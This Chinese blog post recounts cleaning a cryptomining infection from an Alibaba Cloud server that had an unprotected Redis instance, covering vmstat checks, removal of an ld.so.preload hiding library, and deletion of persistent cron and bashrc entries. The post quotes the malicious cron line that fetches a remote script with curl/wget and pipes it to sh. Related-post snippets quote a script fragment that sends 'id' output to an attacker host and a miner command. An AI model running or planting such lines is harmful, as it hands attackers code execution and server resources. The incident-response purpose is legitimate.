阿里云服务器遭受挖矿程序的入侵的清理之战

最新推荐文章于 2024-10-01 10:44:30 发布
置顶 最新推荐文章于 2024-10-01 10:44:30 发布
阅读量2.7k 收藏 5
点赞数 2
分类专栏: 安全防护 文章标签: 安全防护
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38685242/article/details/97390088
版权
本文详细记录了在阿里云服务器上遭遇挖矿程序攻击后的排查和清理过程,包括关闭入侵入口、清除隐身进程和定时任务,以及恢复系统安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1. 背景

最近在阿里云服务器上安装了缓存redis,由于没有设置密码,并且开放了6379端口,遭受了挖矿程序攻击。操作系统为centos7。

2. 排查

(1)使用top命令,cpu使用率很少,几乎为0,该图只是演示,不是当时情况,当时情况:cpu使用率为0,空闲100%,明显很有问题
在这里插入图片描述
这个时候,说明挖矿程序改变你的服务器,看到的并不真实,这个时候需要一个命令:vmstat
在这里插入图片描述
你会发现us为99 id几乎为0

(2)查看Linux的定时任务cron,使用命令crontab -l 命令查看所有的定时任务,如果没有设置定时执行脚本的计划,发现多了一个任务计划:

*/10 * * * * root (/usr/local/sbin/sshd||curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh

看到这任务计划,明显不是自己设置的
再使用crontab -e编辑,也发现了这个执行计划,这时候你试图删除它,我没那么幸运,我删除不掉它。删除还是会出现。想想都很可恶。而这个可恶的程序地址就是看到的 lsd.systemten.org,用浏览器打开它就是shell脚本。
在这里插入图片描述
了解shell脚本的可以看看它都干了啥,如何把你服务器当成了傻子。真想举报它,不知道去哪举报。
(3)这个时候,我发现我的ps grep命令都找不到redis的进程,还有java 进程。

3. 清理之战

【自己根据网上分享综合操作,总结了完整步骤,打仗要有完整思路才能取胜】

步骤一:首先要关闭入侵的所有入口

redis此时可能已经被破坏,打开阿里云安全中心,你能看到阿里云的入侵警告消息,此时发现redis-server这个脚本已经被注入了自动任务,果断删除编译安装的redis目录所有文件。
设置安全组规则:阻断自动任务脚本请求的访问的地址
甚至的出方向 此时你要设置ip,可以ping 挖矿脚本地址获取的它的ip
在这里插入图片描述
入方向:关闭6379端口

步骤二:“关起门来,打狗!!!!”

此时门是关好了,打狗必须找狗,此时你可能会忽然发现,你找不到它!!!
无论你使用top . ps -aux等命令都好像无法使用一样,根本不能发现占cpu资源那个最高的线程。因为它采用用了隐身机制,这个隐身机制是:利用Linux预加载型恶意动态链接库的后门。
想了解的可以参考:https://www.freebuf.com/column/162604.html
这个后门就是这个文件

/etc/ld.so.preload

打开这个目录你可能看不到它,直接使用

vim  /etc/ld.so.preload

打开文件后你会发现它加载一个文件:

/usr/local/lib/libcupscgi-6.1.so

就是这个文件让它的进程的遁形,此时你想干啥,抡起来打狗啊!!!

去这个目录果断删除libcupscgi-6.1.so并且删除预加载文件ld.so.preload的内容,预加载的文件不要删除哈。

这个时候只是把狗的隐身功能打掉,它的本身还是存活的。

这个时候使用top命令发现一个高消耗cpu的进程,找到目录,删掉文件,果断杀掉。

杀掉后你发现cpu和内存还是不断增加,为啥

因为定点任务计划不断的再请求外界的挖矿程序木马,

 crontab -e  编辑删掉任务计划

 cd  /usr/spool/cron/ 删除所有不是你的任务计划

如果删不掉,或者无法编辑保存:可以使用
chattr -ia xxxx 自己可以了解下lsattr 和chattr命令的使用

最后感觉清理的差不多了

此时cpu似乎下降下来了,但是内存还是不断增加,最后cpu也最后高达100%。难道是还没清理干净吗?

步骤三:最后一击

研究很久,发现:

ps -ef|grep lsd.systemten.org

很多线程,不断的

curl -fsSL lsd.systemten.org,
wget -q -O- lsd.systemten.org

找了很久也发现这个请求程序在哪里,根据网上的根据进程pid找路径
也无果。
最后想了一个办法,既然它不断使用curl和wget工具请求脚本,那我直接卸载wget,看看它在哪里报错,就能找到了。
果然:

/etc/bashrc wget :无法找到该命令

马上编辑:

vi  /etc/bashrc-

你发现最后有:

*/10 * * * * root (/usr/local/sbin/sshd||curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh

隐藏的可够深的!!!!!

4. 总结

外网使用redis一定要设置密码和绑定ip,改变默认端口。毕竟关门打狗很浪费时间。如果你和我一样摸着石头过河,希望这个篇文章能帮助你。

记一次阿里云服务器CPU长期100%发现被被种挖矿程序解决的过程(挖矿入侵应急响应)
墨痕诉清风的博客
11-18 2697
记一次阿里云服务器被被种挖矿程序解决的过程。
阿里云服务器中招挖矿病毒XMrig miner解决方法
热门推荐
Starbme_2018的博客
03-18 1万+
今天阿里云的项目经理给我打电话问我的服务器是否没有使用计划,确实自从上次中毒后就没再使用。今天登录阿里云服务器 WindowsServer2012 远程桌面,发现XMrig miner.exe cpu进程占用高达80%以上,cpu总占用达到99%,查了下时间是昨天十点开始进程占用率奇高的,因此我知道头痛的事情又来了:挖矿病毒又回来了。。。 查了一下告警信息,如下: 该告警由如下引擎检测发现:...
阿里云服务器挖矿程序侵入问题
samfaker的博客
08-23 1545
gitlab漏洞引起的无文件、无定时任务的挖矿程序解决方法
阿里云服务器挖矿程序攻击
戴着红领巾走世界
02-08 996
删除恶意脚本文件,直接rm删除不了,需要修改下文件的属性 cd /etc/ rm -f newinit.sh #查看文件属性 lsattr newinit.sh #修改文件属性 chattr -ia newinit.sh 查看定时任务中是否有任务,如果有就删除了此定时任务 * /30 * * * * sh /etc/newinit.sh >/dev/null 2>&1 直接用crontab -e删除没有权限 ...
阿里云服务器存在恶意挖矿程序
u014203449的博客
03-01 5799
阿里云发了很多短信。 进入服务器,发现速度缓慢。 输入 top命令查看cpu利用率,发现被占满。networkservice , sysupdate这两个程序。 netstat -anop 也能查询到很多 networkservice的程序用tcp在运行, 首先kill掉上述进程,但是没有卵用,还是很卡,top命令发现这些程序又启动了。 可以在 /proc/[...
阿里云服务器遭到挖矿攻击的问题
ahoges的博客
04-24 1053
这两天发现老是被攻击,阿里云提示遭到挖矿程序攻击,我一个top,一看都飙到99%了(阿里云服务器牛逼),网上给的一些解决方案都不行,然后我发现我的docker上面凭空多了一个到两个ubuntu容器,容器和镜像的创建时间是被修改过的,一开始都没注意到,把容器停止,删掉镜像,挖矿程序果然就不见了。 ...
阿里云服务器中了挖矿程序应该如何清除
m0_65455195的博客
12-17 5983
阿里云服务器中了挖矿程序如何处理?云安全中心安全告警短信提醒云服务器中了挖矿程序怎么处理?护云盾来详细说下阿里云服务器挖矿程序的解决方法,一种是使用云安全中心自动处理,另一种方式是自行手动清除。 阿里云服务器挖矿程序解决方法 如果你的阿里云服务器中了挖矿程序,你有两种处理方式,一种是使用云安全中心自动清理,另一种是手动清除: 云安全中心处理挖矿程序 1、登录到云安全中心控制台 2、左侧栏,选择“威胁检测”--“安全告警处理” 在安全告警处理列表中,找到挖矿程序,然后点“处理” 云安全中心安
张大哥笔记:服务器有挖矿木马程序,该如何处理?
qq1369153265的博客
04-29 1026
挖矿是跟区块链以及虚拟币有关系,虚拟币是挖矿挖出来的,每间隔一段时间,比特币或者以太坊虚拟币就会在他们的区块链系统上生成一个块的随机代码,网络上的所有服务器都可以去找这个随机代码,也就是挖矿的过程对这个随机代码进行挖掘,谁挖到这个代码就会产生一个区块链的块,那么比特币跟以太坊就会奖励找到随机代码的人,奖励一定数量的虚拟币,那么挖矿的人就会有动力去挖矿,去维护整个区块链节点的网络正常运行,挖矿需要计算哈希值需要服务器的处理能力,所以有些攻击者利用入侵别人服务器来给自己挖矿获取利润。
阿里云服务器被[crypto]攻击导致CPU爆满(已解决)
大鹏
07-14 1807
缘由 之前玩Docker并开放了2375端口和redis 弱密码 且默认6379端口 的时候,安装时未使用密码,然后还在阿里云开放了0.0.0.0的6379端口,导致出现了漏洞, 现象 被安装了Docker镜像且启用了容器运行。 Reids多了几条任务计划的缓存数据 /usr/share 目录下多了 5个文件 -rwxr-xr-x 1 root root 4563624 Jul 1 17:46 '[crypto]' -rw-r--r-- 1 root root 4384...
阿里云ECS服务器被攻击,植入挖矿程序的处理历程(您的云服务器由于被检测到对外攻击,已阻断该服务器对其它服务器端口(TCP:22)的访问)、ssh远程端口的修改
最新发布
m0_64422133的博客
10-01 1707
您的云服务器(xxx.xxx.x.xx)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(TCP:22)的访问,阻断预计将在2024-10-02 05:39:24时间内结束,请及时进行安全自查。
处理阿里云服务器中的恶意挖矿程序
weixin_43268590的博客
06-24 1180
恶意挖矿程序会在未经用户许可的情况下在用户的设备上运行,占用大量计算资源进行挖矿,这可能会导致设备性能下降、温度升高、甚至硬件损伤。因此,用户应当做到以下措施来尽可能地预防挖矿: 及时更新系统和应用程序的安全补丁; 安装安全软件; 加强用户权限管理; 提升防火墙的安全级别,关闭不需要的服务端口; 监控服务器日志等。
阿里云ECS遭挖矿程序攻击解决方法
weixinhmz的博客
08-21 345
阿里云ECS遭挖矿程序攻击解决方法
阿里云服务器挖矿程序minerd入侵的终极解决办法
danson_yang的专栏
12-19 2536
突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下:  3798 root      20   0  386m 7852 1272 S 300.0  0.1   4355:11 /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM...
Ubuntu | ERROR: ld.so: object ‘/usr/lib64/libthread.so.1‘ from /etc/ld.so.preload cannot be preloade
我是一块小石头
02-07 3985
错误一览 ERROR: ld.so: object '/usr/lib64/libthread.so.1' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. root@xxx:~# root@xxx:~# ls ERROR: ld.so: object '/usr/lib64/libthread.so.1' from /etc/ld.so.preload cannot be prel
阿里云——云安全中心安全事件提醒:挖矿程序
iamcool345的博客
05-22 5994
近日收到云安全中心安全事件提醒,“出现了紧急安全事件:挖矿程序,建议您立即登录查看事件详情,并根据事件建议的方案进行处理。” 登录服务器后用top命令查看CPU利用率并不高,感觉不一定真是挖矿程序在作怪,或挖矿还没启动。用ps -ef命令列出进程,发现一个名为“httpdz”的可疑进程,杀死进程后,这个httpdz又立即启动。 查阅/etc/crontab、/etc/cron.d和/var/s...
阿里云服务器入侵执行MoneroOcean(门罗币)挖矿脚本
weixin_54071027的博客
06-26 1万+
为学习使用Redis,在阿里云Linux服务器上安装了redis并且后台运行,开放了默认端口,而且没有设置访问密码,当天晚上被执行了恶意脚本。 恶意代码如下,分享一下: #!/bin/bash us=$(id) curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null ulimit -n 65535 export MOHOME=/usr/share mkdir $MOHOME -p if [ -f "$MOHOME/[
阿里云服务器挖矿病毒解决办法(已实践)
qq_49182770的博客
02-13 9103
1、cpu过高,中病毒了 2、进入Linux连接阿里云服务器 3、使用top命令动态查看cpu占用率 两种情况 1、未发现占用率很高的进程,跳到第七步 2、发现了占用率很高的进程,使用kill -9 pid 杀死进程会发现病毒继续出现,没用,跳到第四步 4、查看病毒文件地址 输入 ls -l /proc/{病毒PID}/exe 查看病毒路径 5、进入病毒文件,将其统统删除 6、kill 杀死进程,完成,再次查看cpu,无病毒进程搞定 7、如果阿里云服务器中显示c.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值